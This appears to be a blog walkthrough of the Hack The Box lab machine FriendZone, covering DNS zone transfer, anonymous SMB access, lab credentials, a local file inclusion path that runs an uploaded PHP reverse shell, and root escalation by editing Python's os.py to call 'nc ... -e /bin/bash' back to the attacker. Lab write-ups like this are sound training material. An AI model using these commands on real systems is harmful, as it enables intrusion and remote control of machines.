HTB FriendZone — Walkthrough

root@ArmourInfosec:/ namp -sV -p- 10.10.10.123
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Let’s visit on port number 80 and see what’s going on there

got some lines,image and an email nothing else in source or etc.

port 443 is also open which stands for https version of site so lets visit there

it is showing / not found, but what i think is there is a dns and we can expect that many domains are hosted on a single IP so direct ip access is not allowed so what will do is I got a email from http page just inserted the ip with the domain in email in my host file then tried to visit

and got it the page but i completely enumerated the page and found nothing, when i performed a nikto scan i found that the ssl certificate is registered as friendzone.red

so again changed my host file then visited https://friendzone.red

In nmap scan we knew that 53 is open on tcp which indicates a chance of zone transfer so I will go for that now

root@ArmourInfosec:/ dig axfr @10.10.10.123

got response but nothing, the zone transfer is not enabled for root zone let’s change the zone and then try

root@ArmourInfosec:/ dig axfr friendzoneportal.red @10.10.10.123

and got some domains !!!inserted them in host file

https://administrator1.friendzone.red/          #Login Panel
https://uploads.friendzone.red/ #A upload file button
https://hr.friendzone.red/ #Nothing

So we need credentials for login, On more port is open which we don’t have.’t enumerated that is for smb

For that i will use smbclient and will try to get shares with smb null login

root@ArmourInfosec:/ smbclient -L 10.10.10.123Sharename       Type      Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))

got some shares let’s try to access and have a look if we can find something, I found the cred.txt file containing credentials in general shares admin:WORKWORKHhallelujah@#

login admin panel from this credentials, visited dashboard.php as shown there

on enumerating and fuzzing a found that page I found that one of the parameter pagename is vulnerable with LFI, So we can access the shell we uploaded from smb

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/../../../../../etc/Development/phpreverse

and got reverse shell visited /home/friend and read user.txt

then in /var/www/ there is a conf file of mysql in which there are password of friend user

db_user=friend
db_pass=Agpyu12!0.213$

after login import pspy64 and LinEnum, in the output of pspy64 script there is a file reporter.py in /opt/server_admin running as root in every 2 minutes, It is not writable but it is importing os module and in enumeration found that we can edit /usr/lib/python2.7/os.py

Just added one line in os.py

system("nc 10.10.14.1 443 -e /bin/bash")

and wait for some time after some time I get a connection back of root user to my system

b0e6c60b82c********ac1656a9e90c7

--

--

--

Security Researcher | OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Vaibhav Joshi

Vaibhav Joshi

Security Researcher | OSCP

More from Medium

Hacker101 Micro-CMS v1 CTF Walkthrough

HackTheBox [FORGE]

[CTF] 1337up CTF writeup- Mirage

Vulnhub: Pwned 1 Walkthrough